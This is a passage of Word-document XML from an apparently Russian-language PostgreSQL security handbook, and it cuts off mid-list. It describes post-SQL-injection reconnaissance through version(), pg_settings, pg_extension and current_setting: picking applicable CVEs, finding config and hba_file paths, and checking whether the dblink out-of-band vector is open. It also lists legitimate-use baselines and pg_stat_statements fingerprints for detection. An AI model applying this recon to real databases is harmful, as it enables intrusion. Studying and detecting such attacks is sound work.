    <w:p w14:paraId="7B8FF2EE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Атакующий собирает полную карту того, что в кластере доступно и применимо:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C678B85" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Точная версия (major.minor) + дистрибуция + ОС</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → выбор применимых CVE из раздела 4. Один запрос — десятки исключённых из дальнейших попыток векторов (нет смысла пробовать CVE-2024-10979, если кластер 16.5+).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B605F49" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Пути конфигов</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → следующий шаг 3.6.3 без угадывания дистрибуции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B343190" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`shared_preload_libraries` и `log_statement`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → ожидаемая видимость в логах; решение, насколько громко вести себя на следующих шагах.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5E2412" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_extension`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → бинарное решение, применимы ли категории 3.6.1, 3.6.2, 3.7.2, 3.7.3. Если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> отсутствует и роль не superuser — OOB-вектор закрыт, надо искать другой.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729AC0AB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`row_security`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → нужно ли вообще обходить RLS (3.17) или его нет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DE6352" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F951CBA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>version()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — built-in функция, возвращает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'PostgreSQL ' || server_version || ' on ' || system_type || ', compiled by ' || compiler ', 64-bit'</w:t>
      </w:r>
      <w:r>
        <w:t>. Никаких прав не требует. Часть строки про дистрибуцию вшивается на этапе сборки пакета и не настраивается без пересборки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067BE08B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_settings</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — view, формируемый рантайм-обходом всех GUC. SELECT на view выдан </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Скрытие значений для не-привилегированных ролей применяется к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>конкретным</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> настройкам (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dynamic_library_path</w:t>
      </w:r>
      <w:r>
        <w:t>, путь к unix socket с авторизацией), но для всего списка из Payload B — всё видно PUBLIC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5961E739" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_setting('name')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — функция-обёртка над </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_settings</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; с одним аргументом для не-существующей настройки падает с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>unrecognized configuration parameter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, для существующей — возвращает текстовое значение. Двухаргументная форма </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_setting(name, missing_ok)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (PG 9.6+) с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>missing_ok=true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> возвращает NULL вместо ошибки — полезно при разведке кастомных GUC от расширений.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF04E6D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_extension</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — обычная таблица в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_catalog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, SELECT выдан </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. То же для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_available_extensions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (view над файловой системой).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFD6178" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>inet_server_addr()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>inet_server_port()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_postmaster_start_time()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — built-in, без специальных прав. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_postmaster_start_time()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> показывает uptime → если кластер не рестартовался полгода, ни один minor-patch не применён (PG требует restart для апгрейда).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F91296F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEF7672" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG-версия:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 14–17. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>version()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_settings</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_extension</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> стабильны с 9.x; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_setting(name, missing_ok)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — PG 9.6+; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>server_version_num</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — PG 8.2+.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139FB534" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Расширения:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не требуются.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F751CC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегии:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PUBLIC на всё. См. таблицу в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.0</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B09EB01" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Конфиги GUC:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> работает при любых дефолтах. На managed настройки могут показывать masked значения для специфичных параметров (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cloudsql.iam_authentication</w:t>
      </w:r>
      <w:r>
        <w:t>), но 90% списка из Payload B виден.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268974C9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0251FA52" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>version()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — легитимно используется healthcheck-эндпоинтами приложения, миграторами (Alembic проверяет min-version), CI-скриптами. В </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от application-роли — норма. Атака — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>version()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через UNION в payload-е, попадающий в логи как часть SELECT-а с несогласованными типами (например, в response WHERE для текстового поля приходит timestamp).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFCD137" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_settings</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — то же. Легитимные читатели: миграторы, мониторинг (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_settings</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> опрашивается каждые 30s/1m metric-агентами), DBA-инспекторы. Атака — конкретные WHERE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE name IN ('hba_file', ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (комбинация имён конфиг-файлов и SSL-путей — отпечаток recon, не мониторинга).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F2F205" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_extension</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — миграторы при </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION IF NOT EXISTS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> сначала читают (Alembic, Flyway). Атака — широкая выборка без WHERE, особенно с JOIN на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_namespace</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313B556D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Маркер атаки в нормализованном </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT $1, name || $2 || setting, now() FROM pg_settings WHERE name IN ($3, $4, $5, $6, $7, $8, $9, $10, $11, $12, $13, $14)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — характерный отпечаток Payload B (множественные литералы в IN, конкатенация name + setting).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C49057F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_setting('is_superuser')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от application-роли — однозначно подозрительно: код приложения не должен проверять, является ли его роль superuser-ом (если есть такая проверка — это или escalation-detection в самом приложении, или recon атакующего).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2864BD3E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBCC0C6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Работает на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 14–17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в полном объёме.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533C502F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> все три payload-а работают везде (RDS, Cloud SQL, Supabase). Что меняется:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDCF643" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>version()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> показывает кастомный suffix провайдера: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>... (Ubuntu 16.4-1.pgdg22.04+1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → стандарт; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>... (Debian 16.4-1.pgdg+1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → стандарт; кастом-сборки RDS (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>16.4-rds-...</w:t>
      </w:r>
      <w:r>
        <w:t>) и Cloud SQL (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>16.4-google-...</w:t>
      </w:r>
      <w:r>
        <w:t>) — fingerprint провайдера сразу.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E04459" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_settings</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — частично masked (специфичные GUC провайдеров часто скрыты для не-superuser; например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cloudsql.*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> параметры).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AB0CA3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
